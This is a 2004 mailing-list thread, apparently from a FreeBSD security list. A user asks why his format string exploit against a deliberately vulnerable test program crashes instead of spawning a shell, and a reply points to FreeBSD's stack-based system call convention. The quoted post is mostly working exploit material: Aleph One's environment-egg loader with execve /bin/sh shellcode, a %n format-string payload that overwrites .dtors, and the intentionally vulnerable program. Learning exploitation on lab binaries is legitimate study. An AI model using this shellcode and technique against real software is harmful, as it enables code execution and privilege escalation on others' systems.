i didn't look at your shellcode, but if you're using generic aleph code
it won't work on freebsd. freebsd makes system calls differently from
linux: it doesn't put the args in registers, it pushes them onto the
stack. if you're trying to learn how to write exploits, then when the
thing dumps core, you should probably look at the core dump. it will
tell you where it dumped core, and you can look at the dtors address to
verify that you actually overwrote the correct location with the correct value.
On Thu, 29 Jul 2004 17:02:50 +0900
Ganbold <ganbold_at_micom.mng.net> wrote:
> Hi all,
>
> I have a problem with a sample format string exploit on FreeBSD 5.2-CURRENT.
>
> $uname -an
> FreeBSD localhost 5.2-CURRENT FreeBSD 5.2-CURRENT #8: Wed Mar 3
> 11:09:58 ULAT 2004 tsgan_at_localhost:/usr/obj/usr/src/sys/MX i386
>
> I'm using http://www.groar.org/expl/howto/fmtbuilder.txt to build the
> format string.
>
> I can get the offset:
> ---------------------------------------------------------------------
> ------------------------------------
> bash-2.05b$ ./fmt_vuln "AAAA %x %x %x %x %x %x"
> The right way:
> AAAA %x %x %x %x %x %x
> The wrong way:
> AAAA bfbfdfb8 0 0 0 0 41414141
> [*] test_val @ 0x0804977c = -72 0xffffffb8
> ---------------------------------------------------------------------
> ------------------------------------
>
> Then I'm getting DTORs address:
>
> ---------------------------------------------------------------------
> ------------------------------------
> bash-2.05b$ objdump -s -j .dtors fmt_vuln
>
> fmt_vuln: file format elf32-i386-freebsd
>
> Contents of section .dtors:
> 8049824 ffffffff 00000000 ........
>
> bash-2.05b$ nm ./fmt_vuln|grep DTOR
> 08049828 d __DTOR_END__
> 08049824 d __DTOR_LIST__
> ---------------------------------------------------------------------
> ------------------------------------
>
> Afterwards I'm storing shellcode in env using AlephOne's exploit code
> (See below).
>
> ---------------------------------------------------------------------
> ------------------------------------
> $ ./getsx1 200
> Using address: 0xbfbfec78
> bash-2.05b$
>
> bash-2.05b$ ./getenvaddr EGG
> EGG is located at 0xbfbfe557
> ---------------------------------------------------------------------
> ------------------------------------
>
> When I run exploit I get:
>
> ---------------------------------------------------------------------
> ------------------------------------
> bash-2.05b$ ./fmt_vuln `./fmtbuilder -n -a 0x08049828 -r 0xbfbfe557 -o 6 -b 0`
> Format string builder version 0.2
> (C) 2001 Pappy & Zorgon
>
> [ Building the fmt string ... ]
> [ Building completed (52) ]
> [ Checking the fmt string ... ]
> [ Checking completed (52) ]
>
> [ fmt string ] = %327x%6$n%398x%7$n%218x%8$n%256x%9$n
>
> The right way:
> %327x%6$n%398x%7$n%218x%8$n%256x%9$n
> The wrong way:
> Bus error (core dumped)
>
> bash-2.05b$ ./fmt_vuln `./fmtbuilder -n -a 0x08049824 -r 0xbfbfe557 -o 6 -b 0`
> Format string builder version 0.2
> (C) 2001 Pappy & Zorgon
>
> [ Building the fmt string ... ]
> [ Building completed (52) ]
> [ Checking the fmt string ... ]
> Found a % at 4.
> [ Checking completed (52) ]
>
> [ fmt string ] = %%327x%6$n%398x%7$n%218x%8$n%256x%9$n
>
> The right way:
> %%327x%6$n%398x%7$n%218x%8$n%256x%9$n
> The wrong way:
> Bus error (core dumped)
>
> ---------------------------------------------------------------------
> ------------------------------------
>
> So I get a "Bus error (core dumped)" result, but in my opinion I should
> get a shell. Somehow the exploit is not working and I don't know the reason.
> I tried many times with no result.
> It seems like format string exploitation on FreeBSD is different from
> Linux.
>
> Does anybody have experience developing format string exploits on
> FreeBSD?
> Has somebody solved this kind of problem before?
>
> Can somebody give me some hints, advices and guides?
>
> I googled for this kind of problem and found only that someone on this
> list had the same problem last June,
> but I didn't find the solution.
>
> Can somebody help me in this regard?
>
> thanks in advance,
>
> Ganbold
>
>
> The following are the vulnerable program, getenvaddr.c, and the Aleph One exploit:
>
> ---------------------------------------------------------------------
> ------------------------------------
> Vulnerable program:
> ---------------------------------------------------------------------
> ------------------------------------
> #include <stdlib.h>
>
> /* Deliberately vulnerable test program: echoes argv[1] once safely and once
>    as a format string. Note: printf/strcpy are used without <stdio.h>/<string.h>,
>    so they are implicitly declared here. */
> int main(int argc, char *argv[])
> {
> char text[1024];
> static int test_val = -72;
>
> if(argc < 2)
> {
> printf("Usage: %s <text to print>\n", argv[0]);
> exit(0);
> }
> /* Unbounded copy: an argv[1] longer than 1023 bytes overflows text.
>    A bounded copy (e.g. snprintf(text, sizeof text, "%s", argv[1])) would prevent this. */
> strcpy(text, argv[1]);
>
> printf("The right way:\n");
> /* Safe: the user data is an argument, the format is a literal. */
> printf("%s", text);
>
> printf("\nThe wrong way:\n");
> /* Format-string bug: the user-controlled buffer is the format argument, so any
>    conversions it contains (including %n, which writes) are interpreted by printf.
>    The fix is the "%s" form used above. */
> printf(text);
> printf("\n");
>
> // Debug output
> /* &test_val is a pointer printed with %08x; %p is the matching conversion. */
> printf("[*] test_val @ 0x%08x = %d 0x%08x\n", &test_val, test_val,
>
> test_val);
>
> exit(0);
> }
> ---------------------------------------------------------------------
> ------------------------------------
>
>
> Aleph One's exploit code
> ---------------------------------------------------------------------
> ------------------------------------
> #include <stdlib.h>
>
> #define DEFAULT_OFFSET 0
> #define DEFAULT_BUFFER_SIZE 512
> #define DEFAULT_EGG_SIZE 2048
> #define NOP 0x90
>
> char shellcode[] =
> "\x31\xc0" /* xorl %eax, %eax */
> "\x50" /* pushl %eax */
> "\x68\x2f\x2f\x73\x68" /* pushl $0x68732f2f */
> "\x68\x2f\x62\x69\x6e" /* pushl $0x6e69622f */
> "\x89\xe3" /* movl %esp, %ebx */
> "\x50" /* pushl %eax */
> "\x53" /* pushl %ebx */
> "\x89\xe2" /* movl %esp, %edx */
> "\x50" /* pushl %eax */
> "\x52" /* pushl %edx */
> "\x53" /* pushl %ebx */
> "\x50" /* pushl %eax */
> "\xb0\x3b" /* movb $0x3b, %al */
> "\xcd\x80" /* int $0x80 */
> "\x31\xc0" /* xorl %eax, %eax */
> "\x40" /* inc %eax */
> "\x50" /* pushl %eax */
> "\x50" /* pushl %eax */
> "\xcd\x80"; /* int $0x80 */
>
>
> unsigned long get_esp(void) {
> __asm__("movl %esp,%eax");
> }
>
> void main(int argc, char *argv[]) {
> char *buff, *ptr, *egg;
> long *addr_ptr, addr;
> int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
> int i, eggsize=DEFAULT_EGG_SIZE;
>
> if (argc > 1) bsize = atoi(argv[1]);
> if (argc > 2) offset = atoi(argv[2]);
> if (argc > 3) eggsize = atoi(argv[3]);
>
> if (!(buff = malloc(bsize))) {
> printf("Can't allocate memory.\n");
> exit(0);
> }
> if (!(egg = malloc(eggsize))) {
> printf("Can't allocate memory.\n");
> exit(0);
> }
>
> addr = get_esp() - offset;
> printf("Using address: 0x%x\n", addr);
>
> ptr = buff;
> addr_ptr = (long *) ptr;
> for (i = 0; i < bsize; i+=4)
> *(addr_ptr++) = addr;
>
> ptr = egg;
> for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)
> *(ptr++) = NOP;
>
> for (i = 0; i < strlen(shellcode); i++)
> *(ptr++) = shellcode[i];
>
> buff[bsize - 1] = '\0';
> egg[eggsize - 1] = '\0';
>
> memcpy(egg,"EGG=",4);
> putenv(egg);
> memcpy(buff,"RET=",4);
> putenv(buff);
> system("/usr/local/bin/bash");
> }
> ---------------------------------------------------------------------
> ------------------------------------
>
> getenvaddr.c
> ---------------------------------------------------------------------
> ------------------------------------
> #include <stdlib.h>
>
> /* Prints the address of the named variable in this process's environment.
>    printf is used without <stdio.h>, so it is implicitly declared here. */
> int main(int argc, char *argv[])
> {
> char *addr;
> if(argc < 2)
> {
> printf("Usage:\n%s <environment variable name>\n", argv[0]);
> exit(0);
> }
> /* getenv returns a pointer into this process's own environment block;
>    NULL when the variable is not set. */
> addr = getenv(argv[1]);
> if(addr == NULL)
> printf("The environment variable %s doesn't exist.\n", argv[1]);
> else
> printf("%s is located at %p\n", argv[1], addr);
> return 0;
> }
>
--
-sean
Received on Jul 31 2004